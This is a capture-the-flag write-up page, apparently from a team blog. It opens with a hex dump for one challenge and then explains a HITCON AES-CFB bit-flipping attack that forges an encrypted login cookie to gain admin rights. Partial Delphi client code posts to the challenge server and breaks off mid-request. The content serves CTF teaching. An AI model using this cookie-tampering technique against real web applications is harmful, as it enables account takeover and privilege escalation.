xxd unreadable-4b2868cc26a8dad5695e537a9dd8a164

The flag is visible from line 300:

0000870: cf8b aebc b4fe c681 b63c 9406 5038 bdbe  .........<..P8..
0000880: baa3 6e2e e4e1 7c25 bb4f 23f6 98bb 9843  ..n...|%.O#....C
0000890: 69be 4cf6 cd50 d516 d9d6 3c19 2c96 6ccd  i.L..P....<.,.l.
00008a0: 65f6 3569 195e ec01 ece3 a76c d1bc 3e8c  e.5i.^.....l..>.
00008b0: 9825 99f0 41d4 1ad5 bcff e681 7e6b 7563  .%..A.......~kuc
00008c0: 7087 2664 1297 3cfc c923 966f 5e50 d7e7  p.&d..<..#.o^P..
00008d0: 4e6f bf2f 5c18 9f3b 3e9e 839d b7de c4a0  No./\..;>.......
00008e0: 7932 6aef 1ea4 2d88 1f2c 0b30 b478 47f8  y2j...-..,.0.xG.
00008f0: a1dd c329 552b 02b2 3ec9 0266 3f51 8554  ...)U+..>..f?Q.T
0000900: 68b4 c625 9b75 a0ee dbd6 3ff4 b702 1267  h..%.u....?....g
0000910: 0fd6 3f22 72bf da4f a913 6b6e 72d7 c0a9  ..?"r..O..knr...
0000920: 76a4 3f04 fed7 ded0 d697 8d19 2011 247f  v.?......... .$.
0000930: 22d2 5862 40e9 598f b7ca 7f8e 8991 14b0  "[email protected]
0000940: d9be fdad 2106 5a7f aa11 9bca dfc3 4360  ....!.Z.......C`
0000950: dfe4 84c8 3d48 5d10 1904 7d2d 188a 1267  ....=H]...}-...g
0000960: 93a8 f4bd c8b8 7667 fb1a 5f48 8fa5 35d8  ......vg.._H..5.
0000970: 120b 29d2 428c 6fc6 0a63 c2e1 7315 91fb  ..).B.o..c..s...
0000980: 8ba6 f451 1b0c 4be8 ee17 f6eb 358e ecb6  ...Q..K.....5...
0000990: 3578 3e89 2f61 f566 7be3 5db5 86f3 622d  5x>./a.f{.]...b-
00009a0: 871a 102f f19f fccd 2bbe 6c74 9104 4e79  .../....+.lt..Ny
00009b0: b6bd 0e5d 47cf 7665 0eb5 1108 5e18 8768  ...]G.ve....^..h
00009c0: ede4 3027 8ce8 9e95 e0cc e04f 7719 89e9  ..0'.......Ow...
00009d0: 5fa8 e425 5685 b2b9 17e3 f462 67e1 5515  _..%V......bg.U.
00009e0: 74e9 054f a807 06fa 76ba 0b7e 9774 7d47  t..O....v..~.t}G
00009f0: aafa 5988 e539 2b83 6c86 36ae 4d2e ad36  ..Y..9+.l.6.M..6
0000a00: b1ea 4abf 7efe 9180 4ebb c8aa 5e52 7598  ..J.~...N...^Ru.
0000a10: f4d8 6034 155f d769 1915 7f1f 3deb bf1a  ..`4._.i....=...
0000a20: 86c8 c529 958b b7a6 add1 bd83 e971 676c  ...).........qgl
0000a30: dfdb 55ca f3d7 75f3 f201 5152 26d3 a37b  ..U...u...QR&..{
0000a40: 2ccb 635b 09e2 f55d 065a e226 844c 89e5  ,.c[...].Z.&.L..
0000a50: 0a3f 04a1 9dcc db01 baa5 ed31 1352 9895  .?.........1.R..
0000a60: 11e2 7fe0 0250 0799 5790 0471 d890 c3a7  .....P..W..q....
0000a70: 4eb2 e467 236c c2c5 de4b c17e 68a6 5b63  N..g#l...K.~h.[c
0000a80: 67b0 7972 aae6 3c3a bad1 9186 c4ab af29  g.yr..<:.......)
0000a90: e91b f3ae 9dbc 95ad 3c98 f5ba 1c69 2417  ........<....i$.
0000aa0: 8695 f635 405f c7bf e87f 8562 1d65 58f6  [email protected]_.....b.eX.
0000ab0: f94c 07ad 6c35 ff9a 5074 2c8d dfd7 4c90  .L..l5..Pt,...L.
0000ac0: f95d d345 ce19 3535 e0b2 4eb1 0c84 8fc3  .].E..55..N.....
0000ad0: ee31 0e8d 8071 7e75 2116 08b7 ecd3 a60c  .1...q~u!.......
0000ae0: 66ba 9231 2732 9eea ee75 9062 8656 98d0  f..1'2...u.b.V..
0000af0: 06f1 9f4f e857 09aa 1f41 ff9e d4ad 3e70  ...O.W...A....>p
0000b00: a050 5ecc 9610 8766 61a0 8760 064e b2a8  .P^....fa..`.N..
0000b10: 5abe 0164 99c2 f9d8 6dee a279 05aa 6f60  Z..d....m..y..o`
0000b20: 56bc e437 b47e 6011 242d b340 4e61 3638  V..7.~`[email protected]
0000b30: c731 7c3f 4cad feb9 f7e5 7672 6ec6 5bf7  .1|?L.....vrn.[.
0000b40: f518 99c7 7c1a 6f80 c0f1 7dd3 ece5 495e  ....|.o...}...I^
0000b50: 4edb f678 0e85 de1e b4bf 3dd5 b346 c59e  N..x......=..F..
0000b60: ad83 1097 c38d bf4f 988d da48 aec5 fa56  .......O...H...V
0000b70: 2349 d9ad eb4a af2e e13d af2a f98a 6df4  #I...J...=.*..m.
0000b80: 8b69 c960 c3a0 c43b 4771 8f70 e028 3f16  .i.`...;Gq.p.(?.
0000b90: 5c3f 45e0 821a 7ae6 11f5 2d46 e744 c93b  \?E...z...-F.D.;
0000ba0: 184c ae43 2625 3b56 0610 cb4c fc06 94ea  .L.C&%;V...L....
0000bb0: 97b6 1291 c17f 03c6 9841 8954 968f b552  .........A.T...R
0000bc0: 19bf 8b86 21a7 c87d 736f 41e1 75dc ba76  ....!..}soA.u..v
0000bd0: 1045 65a1 9185 4f76 b314 5cb0 1940 e9f3  .Ee...Ov..\[email protected]
0000be0: aa53 99ef e1c5 7f18 4c01 8b3c d4e3 c7ee  .S......L..<....
0000bf0: bde3 9e41 7244 9bf3 2424 e43c 97a4 921b  ...ArD..$$.<....
0000c00: 334d 7974 1700 0c19 ae46 20ae 6cef eb92  3Myt.....F .l...
0000c10: 8e6c 5bed 720a a520 f45d d525 5317 107e  .l[.r.. .].%S..~
0000c20: 1885 7c5e b62d 95f2 6a12 420b b66d f740  ..|^[email protected]
0000c30: 5696 42dc b7e8 5038 6420 72c3 5659 31ac  V.B...P8d r.VY1.
0000c40: 3f96 6fd6 fcad bde1 8574 f0bf a7c1 5105  ?.o......t....Q.
0000c50: 522d 8863 15dd dba3 7a94 ee9c 46a3 6dc0  R-.c....z...F.m.
0000c60: 4047 2deb ffe7 b41e 8836 1002 ad6e 37fc  @G-......6...n7.
0000c70: f21e 05fc aef0 2361 c336 2fd7 38e4 fedd  ......#a.6/.8...
0000c80: 17d5 1419 f84e 00a3 5acf 9309 7b7d d5eb  .....N..Z...{}..
0000c90: 7858 e284 5098 d52b 7ba3 823c 3fa5 8fb2  xX..P..+{..<?...
0000ca0: 2385 e3d9 d37b 6ef5 db73 51b3 d966 d963  #....{n..sQ..f.c
0000cb0: 21ee 2189 1cce 149e d366 d7a4 36b5 48a4  !.!......f..6.H.
0000cc0: ffdb 8ae6 384f e27d f1d3 a2d3 9756 2bd9  ....8O.}.....V+.
0000cd0: 574d 437e 4e18 ac44 4b87 c21f 6b5a d4d2  WMC~N..DK...kZ..
0000ce0: c5cc ad73 6ad6 6a53 1628 f0bc c029 51c0  ...sj.jS.(...)Q.
0000cf0: 7edf 68f5 690c 92ad e2d3 ff55 1dc4 983f  ~.h.i......U...?
0000d00: ed43 9a97 0fe1 4942 261a ba90 3988 df36  .C....IB&...9..6
0000d10: 8b6b b0d4 9288 f148 33d6 d69c 78f5 5549  .k.....H3...x.UI
0000d20: 599a 0032 827c da29 e827 a521 db41 a810  Y..2.|.).'.!.A..
0000d30: 9b61 9770 4de1 bb58 c719 fb5f 450b 49fc  .a.pM..X..._E.I.
0000d40: cda2 1ba9 6a1b 0e57 128d 021f 61a3 678c  ....j..W....a.g.
0000d50: c77b c507 c588 73f6 a0ff 23e7 169f 925f  .{....s...#...._
0000d60: cb32 66c6 ed48 75f9 6d36 e207 8b76 6ccf  .2f..Hu.m6...vl.
0000d70: 448e d6d5 aa14 3b3d 81cc 31e0 7c1d 218d  D.....;=..1.|.!.
0000d80: 6303 3572 e38f 50cd 4cbd b3e8 f9bf efc6  c.5r..P.L.......
0000d90: d801 9d4b f27f 2efe cccf 3254 a609 c7a8  ...K......2T....
0000da0: c294 269d 8994 7154 8ce9 a935 9d50 8d1b  ..&...qT...5.P..
0000db0: fbec 2222 f950 d50c 440c c928 4ee5 7c6a  .."".P..D..(N.|j
0000dc0: c111 4c22 f7d7 ecd3 8f04 e7db aecb 4cc7  ..L"..........L.
0000dd0: 74f1 2d20 8875 ae23 f1fb 4ee5 0f16 ed54  t.- .u.#..N....T
0000de0: 9957 3bb7 42b6 4ef5 db3f 183c 9f4d 3512  .W;.B.N..?.<.M5.
0000df0: 2841 9bb6 a324 703c ab00 23f0 c7f7 898c  (A...$p<..#.....
0000e00: eebd 534a 6476 1b90 9a0f fdc9 998d 263b  ..SJdv........&;
0000e10: 6f9c cabf 98f2 cc8d c137 ddd6 0fb2 32f3  o........7....2.
0000e20: 15ac 0e29 ea93 5644 0dd0 ae2e addc 4b0e  ...)..VD......K.
0000e30: 5d68 1f92 1f53 d950 4997 27d8 03aa d521  ]h...S.PI.'....!
0000e40: 93f8 8227 7170 58b1 4be7 3921 6564 f14e  ...'qpX.K.9!ed.N
0000e50: 3fff 4514 af8a cc17 3731 9390 9063 9fa4  ?.E.....71...c..
0000e60: 0360 fc9c d5cc 1c2c da2b 9066 5d23 f647  .`.....,.+.f]#.G
0000e70: 40a2 2eb3 6a94 4621 efb4 4d20 4498 30e8  @...j.F!..M D.0.
0000e80: 7a54 95b7 6634 bfa7 9ed7 4cd2 cf30 d3d1  zT..f4....L..0..
0000e90: 6d22 296f c5a3 7fbd bdf6 7b84 3f16 11bc  m")o......{.?...
0000ea0: 8e99 8e59 1da4 1ec2 5f4d 5425 29f5 1c99  ...Y...._MT%)...
0000eb0: 9b4a 5764 1cf9 9fed 8bd2 a0e6 6644 d89d  .JWd........fD..
0000ec0: 85d6 6c44 3f76 7933 e9cd b2c8 71c7 d330  ..lD?vy3....q..0
0000ed0: 020a e943 b3ff 3b54 8ebb a5ac 879a b9f7  ...C..;T........
0000ee0: 122c 7e4a 4ce4 1a97 a0c8 35e0 c6eb bd1f  .,~JL.....5.....
0000ef0: 4726 d22b 5f18 6eb4 b4db 6913 9af4 f3ae  G&.+_.n...i.....
0000f00: 501e b280 aa8f 0473 dbaf 188e 6041 9236  P......s....`A.6
0000f10: 9424 bbb4 96ab f4c4 e1bf 9833 44a3 259a  .$.........3D.%.
0000f20: aed0 fdbd ded7 5fa6 f573 d4e3 c9eb c298  ......_..s......
0000f30: 8050 f558 928d 3fdf 7e1c 0d76 45d8 2d9d  .P.X..?.~..vE.-.
0000f40: 69ed fdeb c75b 7fbc 3f6b 70c5 610a dbdc  i....[..?kp.a...
0000f50: 47be f29f 2b65 673f 8114 9969 8c3e 98cd  G...+eg?...i.>..
0000f60: 0bf0 8916 f2ae 8c49 3de1 c68a ab00 b14a  .......I=......J
0000f70: 68f2 9918 09cf c619 1017 0670 ca65 a4e0  h..........p.e..
0000f80: bd7e adb0 2e77 27d2 70b8 cd15 82c5 5d7a  .~...w'.p.....]z
0000f90: fadc ed4d 8a11 c068 7b00 0894 e072 c00a  ...M...h{....r..
0000fa0: a9d1 8210 5a2b 754f 9b94 7a9f 42a6 9140  [email protected]
0000fb0: fa36 dd24 7cc5 80d5 d868 3b5a 6c9c 1d66  .6.$|....h;Zl..f
0000fc0: ce60 c361 8679 7500 fe10 248c b54d d848  .`.a.yu...$..M.H
0000fd0: 7d4c 0fc3 3f28 7888 f6f9 80a1 976a e088  }L..?(x......j..
0000fe0: 054e 5cae faf4 8a4c ba6b 97e4 d457 8846  .N\....L.k...W.F
0000ff0: 1d4a e83c 17af ef3b 07cb 2b49 34e3 9159  .J.<...;..+I4..Y

Here is the flag:


The end of the file:

0002630: 8fc5 8f1b fac0 75df f736 6c39 dd88 a9d7  ......u..6l9....
0002640: c136 4e81 4bb5 c0aa 11c3 c38d 6ae9 cd3e  .6N.K.......j..>
0002650: dbde b270 5f3d 7834 0229 943f 3599 9ad7  ...p_=x4.).?5...
0002660: 45d1 3f3d ab90 170d 7b04 106e 5fbc 2125  E.?=....{..n_.!%
0002670: f2c7 ed19 33df 732c 9011 c6df 65a2 204f  ....3.s,....e. O
0002680: eff1 a2b3 6f99 c1f4 a017 9a1c d3a0 0c0a  ....o...........
0002690: 02cb 0e45 eb81 4d90 8cfe d20f 502d 09aa  ...E..M.....P-..
00026a0: cc3f f10a d4b2 b72c 10dc 9ee5 2e1b 2768  .?.....,......'h
00026b0: 51e3 7fe2 3dfa 100d 7fe5 332e 7b7e 22bd  Q...=.....3.{~".
00026c0: 1cce 055a 1e2c e726 cf14 6345 2271 03a9  ...Z.,.&..cE"q..
00026d0: e9de a1dc 7ee8 db19 58e6 285c 4da1 ac12  ....~...X.(\M...
00026e0: fe10 2a9f bd3a 21df c51b 1582 4bc4 9eb5  ..*..:!.....K...
00026f0: dd51 899d 11e7 9eba c94a 4ee9 1278 ac23  .Q.......JN..x.#
0002700: 01d8 4b3c 3c31 736b 7bd8 b35e 189a 5047  ..K<<1sk{..^..PG
0002710: 98f7 fd14 5bf1 1f52 8c0c 1348 77e9 96c6  ....[..R...Hw...
0002720: e027 1a2e 4ae0 5693 9809 ec9d 6d4b 37f9  .'..J.V.....mK7.
0002730: 38db 2736 ec22 97aa c656 e272 10eb e791  8.'6."...V.r....
0002740: 0a74 763d 3b83 aca7 d6e7 fc57 7193 753b  .tv=;......Wq.u;
0002750: cc93 3856 64d2 aac4 5771 f50a 9027 3484  ..8Vd...Wq...'4.
0002760: edb1 f663 da17 cd58 4f9a 345d a3ff ac27  ...c...XO.4]...'
0002770: a276 d8ae fcb7 789b cdc0 a519 c7f1 f107  .v....x.........
0002780: 6f7c bfc7 c5a1 d2ec bbea 1586 181b e3b5  o|..............
0002790: 2642 b758 24be 9958 1638 5e0d 78e7 de14  &B.X$..X.8^.x...
00027a0: cdcb 52c3 81e2 8fb8 175e c454 bb18 2389  ..R......^.T..#.
00027b0: 8ada 5130 109c e10a 6fb4 4e15 8f0a 6151  ..Q0....o.N...aQ
00027c0: 75e8 cf54 4047 a272 1aad 366e d15f dfe7  [email protected]_..
00027d0: 8512 66d4 f375 494f b5dc 6bf7 8ac1 f533  ..f..uIO..k....3
00027e0: 0091 7608 b385 b0ad 3b2f 0870 58f3 3dd1  ..v.....;/.pX.=.
00027f0: 67a5 1141 9d71 3297 a2c1 7383 c243 3192  g..A.q2...s..C1.
0002800: f255 b45a 13ac f451 a31e 9950 1889 a101  .U.Z...Q...P....
0002810: 181f 7dea b76b 1ede 9035 c665 7fc0 e491  ..}..k...5.e....
0002820: 8f55 ec4d a50f 82c7 f71b 7179 c5e1 273d  .U.M......qy..'=
0002830: a63f dfe2 4c13 44ca b770 bbb4 8dd9 637d  .?..L.D..p....c}
0002840: 61ab f2c1 71fa b913 0299 4de7 15f7 fba1  a...q.....M.....
0002850: 8097 c80b 9252 ef87 7b76 00e7 9209 b936  .....R..{v.....6
0002860: ce0b 9a34 733c 80a2 3498 d7cc 6d39 a322  ...4s<..4...m9."
0002870: 4621 ef9e 791a b96d a217 8bc4 d5eb f0ff  F!..y..m........
0002880: c75f c7f8 e3fb 1c0f 4a5b 3e6d b181 7550  ._......J[>m..uP
0002890: 9d0a f94a feb7 8e4a 74fa 4f03 7efa d893  ...J...Jt.O.~...
00028a0: 007a 26b0 38fc b16f 21ef 0d2f 531e 7caa  .z&.8..o!../S.|.
00028b0: 8ee6 7725 45cc 4a6c 37fe 9f53 a7b2 00b9  ..w%E.Jl7..S....
00028c0: 726a adfa 7ae6 e314 2021 f2fa 0eb8 b86c  rj..z... !.....l
00028d0: 0583 760b 2106 2228 45a3 e873 681b 4db3  ..v.!."(E..sh.M.
00028e0: 7ab7 2b0c 4f3a a95f 7fc7 1299 d28a 19b9  z.+.O:._........
00028f0: 2190 2e29 630a 1e84 5e4f 2b38 cc77 bb4e  !..)c...^O+8.w.N
0002900: 5592 75ce cdb2 c362 eeec 1198 1f9b 3bc4  U.u....b......;.
0002910: 431b 1780 7f7a 7f8c 5813 b52a 93ce acd7  C....z..X..*....
0002920: d905 579a 66f3 4560 ea4d 5b6e cebb 4242  ..W.f.E`.M[n..BB
0002930: 915a e7fc 9967 3140 111f 055d f7d1 ca67  [email protected]]...g
0002940: 166a 577f a123 0f72 bebd f41f ab5d 63b9  .jW..#.r.....]c.
0002950: 4f71 c124 f492 b944 1439 93d2 405e 4075  [email protected]^@u
0002960: 1757 0a80 2afc 76e1 dbab 4adf 6a7d 3793  .W..*.v...J.j}7.
0002970: bdb3 e983 b94d 6afb 3d6a f911 6881 5fd4  .....Mj.=j..h._.
0002980: 4237 6537 5647 91a0 7767 7bbf 4533 5f90  B7e7VG..wg{.E3_.
0002990: 2f4e 7a05 d26f a4fc 0627 2581 d2a8 688c  /Nz..o...'%...h.
00029a0: a83b 911d a1ad ae4b 28ec d528 5d58 98ae  .;.....K(..(]X..
00029b0: 6652 678d 1ae6 8de8 45f3 621f 9aeb 50a3  fRg.....E.b...P.
00029c0: fcd5 3b41 4ed9 4710 9fd6 6532 0ac3 7ae6  ..;AN.G...e2..z.
00029d0: 2aea debb 23cf 36f9 c056 7460 0fd8 1593  *...#.6..Vt`....
00029e0: 8169 5258 a577 986c be55 b253 008b a288  .iRX.w.l.U.S....
00029f0: 6497 ee41 b08a 87fa 648d 9f6a b403 2d8b  d..A....d..j..-.
0002a00: 22d7 b867 3eac af03 440a e896 5737 6264  "..g>...D...W7bd
0002a10: e3e0 b959 153b 3fe6 1a0c baf3 aa48 a5a5  ...Y.;?......H..
0002a20: 05dc ece2 91c2 03c9 21a4 4c3e b5a3 e494  ........!.L>....
0002a30: a46c 073d 98b8 fcd5 1d43 7307 3758 166c  .l.=.....Cs.7X.l
0002a40: ef95 0553 3c1a 5fe0 4678 e589 ec46 d54f  ...S<._.Fx...F.O
0002a50: c5f0 d259 c1e3 b0ce c4d0 a8b4 c4d0 822a  ...Y...........*
0002a60: bfe9 3cf9 e52a c025 246f 2198 954b 204d  ..<..*.%$o!..K M
0002a70: 1545 c2f7 64f5 261e e9a6 cbf7 8850 4549  .E..d.&......PEI
0002a80: f026 d329 1851 4b8d 3904 b300 4e38 b396  .&.).QK.9...N8..
0002a90: 5b8c dd34 b215 1449 5b52 ff3d 007a c4d4  [..4...I[R.=.z..
0002aa0: ef56 b345 c199 b236 5a25 867b 9ded 78e0  .V.E...6Z%.{..x.
0002ab0: a3d9 5b66 4f75 5762 7ae4 536f 1037 ece0  ..[fOuWbz.So.7..
0002ac0: 4a1d 9439 b9e2 30a7 1150 f88f 6813 8b45  J..9..0..P..h..E
0002ad0: 41f6 d0ff 4e3b eb73 7626 112f 7a05 7ad2  A...N;.sv&./z.z.
0002ae0: fd9b dd04 a33f 4571 12a2 d39e 76f8 0ea3  .....?Eq....v...
0002af0: c70b a8a5 c035 5cdd 906d 4f89 10bf b7e6  .....5\..mO.....
0002b00: a78a 58e8 73d1 469f 8af8 805e 61ed 550f  ..X.s.F....^a.U.
0002b10: 83fe fb8b 06d3 65f5 4d79 538c a22f faeb  ......e.MyS../..
0002b20: 3aa8 53f6 68e4 45df 856f 20eb d06c 35c3  :.S.h.E..o ..l5.
0002b30: 047d 5761 f432 2a3e e789 95cc 88df 96cf  .}Wa.2*>........
0002b40: 871a da95 1c89 5161 2339 693d 9095 e680  ......Qa#9i=....
0002b50: 02e0 9348 297b ed4c 3c75 1178 ba67 7d92  ...H){.L<u.x.g}.
0002b60: 8b58 faa2 75bd 3402 d7d3 63e8 3f6a e705  .X..u.4...c.?j..
0002b70: 4273 538b 1186 b2bb 460c c51a f9a2 c391  BsS.....F.......
0002b80: 78ff 72c9 3e3e ac34 47fa f9a7 221a 7a87  x.r.>>.4G...".z.
0002b90: 0737 6034 2535 ebb9 3450 3fad 8a3f adbc  .7`4%5..4P?..?..
0002ba0: 86ac 9e07 3bf1 97bc 7423 c1f4 1c48 a886  ....;...t#...H..
0002bb0: 87db 2bef 3c2e 3ee1 d64f 3b16 82ad 74e0  ..+.<.>..O;...t.
0002bc0: ab9d 8e1b fbd4 ff7b 75eb 8f9c aa02 0475  .......{u......u
0002bd0: ea7d b200 34f0 a885 0901 a398 0066 0dcf  .}..4........f..
0002be0: 2017 eb21 4658 16d8 be26 392e 007a 86d1   ..!FX...&9..z..
0002bf0: c709 e40d bcdd f692 5d58 a178 2a08 5b90  ........]X.x*.[.
0002c00: 9ef7 aaff 9385 9919 1142 a1a5 0a2e 8668  .........B.....h
0002c10: 8842 1c24 345e 59e3 8e66 e758 fc65 41ec  .B.$4^Y..f.X.eA.
0002c20: fbd2 dfd8 af73 83ba b3ce 9342 9123 67df  .....s.....B.#g.
0002c30: 199a c714 0614 f9d4 83b6 568f 1550 c450  ..........V..P.P
0002c40: 40a4 5ade 6e8f aff7 ae2d cadf 4d16 8613  @.Z.n....-..M...
0002c50: df60 e0bf f04c a791 abc0 aad6 fdc1 a139  .`...L.........9
0002c60: b3b6 445e 1924 edbe dfa8 b3a9 7e84 9d80  ..D^.$......~...
0002c70: 6275 be08 3b81 0a2b 342b 91d0 5d9e 4126  bu..;..+4+..].A&
0002c80: aca8 f210 14ef 7859 38bb f982 916e 1b7b  ......xY8....n.{
0002c90: cfad c523 d40c 337e 275b 2e1b 63f4 ee25  ...#..3~'[..c..%
0002ca0: 9251 573a fb30 cd93 193d c89a c728 747d  .QW:.0...=...(t}
0002cb0: 05ee 03be 70df 9f9d a9b1 2046 c4da fecb  ....p..... F....
0002cc0: 914f 6b4a caf4 b455 8e57 94f3 ee5c 8357  .OkJ...U.W...\.W
0002cd0: 42dc fe16 8273 83d9 784c 0a83 af82 8cd2  B....s..xL......
0002ce0: 4641 9c7e 9b6a 2aa4 4407 170e 2f97 82d4  FA.~.j*.D.../...
0002cf0: 97e5 08e1 afbd a9d8 29e3 e67f 3947 725f  ........)...9Gr_
0002d00: 384f eaca fe4d 186e 695f 843d 37e3 6cc9  8O...M.ni_.=7.l.
0002d10: c5c0 2d6f fd32 0e54 7340 da37 f041 af26  [email protected]&
0002d20: 42e1 c33e 3feb df0b cde7 8bf1 267b d72f  B..>?.......&{./
0002d30: d881 5b65 93d4 d3da f439 9b58 7730 f875  ..[e.....9.Xw0.u
0002d40: 9f0f a4dc 6739 d464 f04d 7ecb 1b0d 4b35  ....g9.d.M~...K5
0002d50: b03d cd97 e6ae 776e cee7 cef5 9c52 4b21  .=....wn.....RK!
0002d60: 272a 8b8f e4a6 c389 0e80 c026 437b 0747  '*.........&C{.G
0002d70: 69a9 7247 f345 2904 06a6 7787 1da4 983e  i.rG.E)...w....>
0002d80: e6a6 7719 83fe 42e7 225d a5f6 f1e1 6869  ..w...B."]....hi
0002d90: efab 4a3a 05a9 9d26 34df 853d ade3 925a  ..J:...&4..=...Z
0002da0: 7c32 3e14 48c7 c8e5 8f3e bdd7 59d5 2cde  |2>.H....>..Y.,.
0002db0: 137c 1792 2b86 203f 6569 655d 1075 c97e  .|..+. ?eie].u.~
0002dc0: 6a10 389a 50a6 9811 b6bc c65c 280e 94fb  j.8.P......\(...
0002dd0: ec45 1cfd bfc6 64be 1f13 04b1 bd4c 811f  .E....d......L..
0002de0: 44d4 8ffa 73f2 50c7 2462 b725 500a efac  D...s.P.$b.%P...
0002df0: a459 5706 3cfb a70e 43bc fe85 3b5c 7e54  .YW.<...C...;\~T
0002e00: 64b2 2229 2d2f 306d 8f28 d7d9 8262 555f  d.")-/0m.(...bU_
0002e10: 6ca3 6436 057d 8773 7819 e991 828b 74dd  l.d6.}.sx.....t.
0002e20: 7a63 1765 b1e2 ea4c 415a a78c 8d66 3f5b  zc.e...LAZ...f?[
0002e30: 564b 67f3 6ac8 825e 2d05 3183 003a 7b43  VKg.j..^-.1..:{C
0002e40: 0ddd f7b5 2c3b 49f6 aa3c 6484 0c47 9193  ....,;I..<d..G..
0002e50: 92c6 f756 6b60 ce6f a5f9 d0de bc47 5359  ...Vk`.o.....GSY
0002e60: 922f 2675 cd91 db20 6bc6 f980 50a4 1e0d  ./&u... k...P...
0002e70: a4ba cf98 382e 840d 8d41 f8ee a2e3 6252  ....8....A....bR
0002e80: 81e0 9200 ef19 7275 e18d f712 ef98 6c84  ......ru......l.
0002e90: 1398 74d3 061e 9a52 9593 0428 fbf5 c8c6  ..t....R...(....
0002ea0: d66f a71f 6e12 6310 19de 6c72 1301 756a  .o..n.c...lr..uj
0002eb0: 8d77 e798 6da0 aadd 8fa5 cc0d 6605 f1bb  .w..m.......f...
0002ec0: 5e4b 7d8a 15a3 df01 687b 5bb2 a553 7ebf  ^K}.....h{[..S~.
0002ed0: 7b63 3b23 11c0 1a39 d299 cd7e 6662 3674  {c;#...9...~fb6t
0002ee0: fac6 62f3 8a2a 45f1 f9ab d63b 055e 2082  ..b..*E....;.^ .
0002ef0: 7eee 508a 76fc dc90 443c d84b 6526 1b54  ~.P.v...D<.Ke&.T
0002f00: 2747 1680 86c0 ffb8 3879 fd2b 10f7 2385  'G......8y.+..#.
0002f10: 8182 5d8b 0954 28b4 d1a7 e651 2b93 b3ef  ..]..T(....Q+...
0002f20: 46c1 69d2 a47c b740 f444 bf9b 10cd 1bb4  F.i..|[email protected]
0002f30: 09c8 7413 bc50 629f 3620 49fe d07f 920b  ..t..Pb.6 I.....
0002f40: ab10 dbf2 ebdb 7067 15e7 cb5c 58c7 f9e8  ......pg...\X...
0002f50: f88b ac6d 82e5 6d96 1b02 6986 885d e76d  ...m..m...i..].m
0002f60: 1e86 887b b7ee 5604 c3fd ae07 0dc6 c597  ...{..V.........
0002f70: d5f3 d5a3 6e31 50f1 50fd 9ce5 4591 a299  ....n1P.P...E...
0002f80: a2fd d6c0 ee1c ecab 0d59 130e 51ce 291b  .........Y..Q.).
0002f90: b758 b9a0 650a 25ff 3158 b537 9e5a e111  .X..e.%.1X.7.Z..
0002fa0: a068 72fc 6064 3c18 b300 220a 428f a33e  .hr.`d<...".B..>
0002fb0: f4ce d292 a575 208d a16a 6d19 3223 11e1  .....u ..jm.2#..
0002fc0: bbd8 c8a9 ecbf 95fe 8613 6d27 7047 db43  ..........m'pG.C
0002fd0: 8026 be69 925c 76ca 9f18 8cd2 4174 4b93  .&.i.\v.....AtK.
0002fe0: e77d 202c 046a 8460 a646 968e eaa8 cf27  .} ,.j.`.F.....'
0002ff0: 97ba 4be0 eb2c 24bc 3560 fff6 337b a454  ..K..,$.5`..3{.T
0003000: a023 cc7b f719 6788 e4d1 452b d8a0 a262  .#.{..g...E+...b
0003010: d896 abb1 bbd9 c15f 9d04 0a8d 5a59 d468  ......._....ZY.h
0003020: 4144 b3d0 f6c9 6025 5fd8 8f3a 7d67 ae4f  AD....`%_..:}g.O

This challenge was solved, and the write-up was written, by one of my teammates, aljasPOD.

Register with a single-letter username & a single-letter password. The resulting JSON:

{"username":"a","password":"a","db":"hitcon-ctf"}

This is encrypted with AES-CFB, in 16-byte blocks:

{"username":"a",
"password":"a","
db":"hitcon-ctf"
}

and set as the cookie together with the IV.

XORing something into the ciphertext will XOR the same into the corresponding cleartext & fuck up the next block.

If we change the 3rd block from

db":"hitcon-ctf"

to

admin":true}

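(by XORing bytes 49-60 of the cookie, which hold the start of the third ciphertext block because the 16-byte IV comes first, and cutting off the rest of the cookie), we will have what is needed to become admin.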

Our code was (Delphi):

unit Unit3;

interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls;

type
  TForm3 = class(TForm)
    Button1: TButton;
    Edit1: TEdit;
    Edit2: TEdit;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form3: TForm3;

implementation

uses IdTCPClient;

{$R *.dfm}

function EncodeURIComponent(const ASrc: string): UTF8String;
const
  HexMap: UTF8String = '0123456789ABCDEF';

      function IsSafeChar(ch: Integer): Boolean;
      begin
        if (ch >= 48) and (ch <= 57) then Result := True    // 0-9
        else if (ch >= 65) and (ch <= 90) then Result := True  // A-Z
        else if (ch >= 97) and (ch <= 122) then Result := True  // a-z
        else if (ch = 33) then Result := True // !
        else if (ch >= 39) and (ch <= 42) then Result := True // '()*
        else if (ch >= 45) and (ch <= 46) then Result := True // -.
        else if (ch = 95) then Result := True // _
        else if (ch = 126) then Result := True // ~
        else Result := False;
      end;
var
  I, J: Integer;
  ASrcUTF8: UTF8String;
begin
  Result := '';    {Do not Localize}

  ASrcUTF8 := UTF8Encode(ASrc);
    // UTF8Encode call not strictly necessary but
    // prevents implicit conversion warning

  I := 1; J := 1;
  SetLength(Result, Length(ASrcUTF8) * 3); // space to %xx encode every byte
  while I <= Length(ASrcUTF8) do
  begin
    if IsSafeChar(Ord(ASrcUTF8[I])) then
    begin
      Result[J] := ASrcUTF8[I];
      Inc(J);
    end
    else if ASrcUTF8[I] = ' ' then
    begin
      Result[J] := '+';
      Inc(J);
    end
    else
    begin
      Result[J] := '%';
      Result[J+1] := HexMap[(Ord(ASrcUTF8[I]) shr 4) + 1];
      Result[J+2] := HexMap[(Ord(ASrcUTF8[I]) and 15) + 1];
      Inc(J,3);
    end;
    Inc(I);
  end;

   SetLength(Result, J-1);
end;

function DoPost(user: string; pass: string): string;
var C: TIdTCPClient;
    s,s2: string;
    chunked: Boolean;
    ctL: Boolean;
    rem: integer;
    buff: Array of Byte;
    AData: string;
begin
rem := 0;
SetLength(buff,1024);
Result := '';
C := TIdTCPClient.Create;
C.Host := '52.69.244.164';
C.Port := 51913;
C.Connect;
AData := 'username=' + EncodeURIComponent(user) + '&password=' + EncodeURIComponent(pass);
C.IOHandler.WriteLn('POST / HTTP/1.1');
C.IOHandler.WriteLn('Host: 52.69.244.164:51913');
C.IOHandler.WriteLn('Content-Length: ' + IntToStr(Length(AData)));
C.IOHandler.WriteLn('Content-Type: application/x-www-form-urlencoded');
C.IOHandler.WriteLn('');
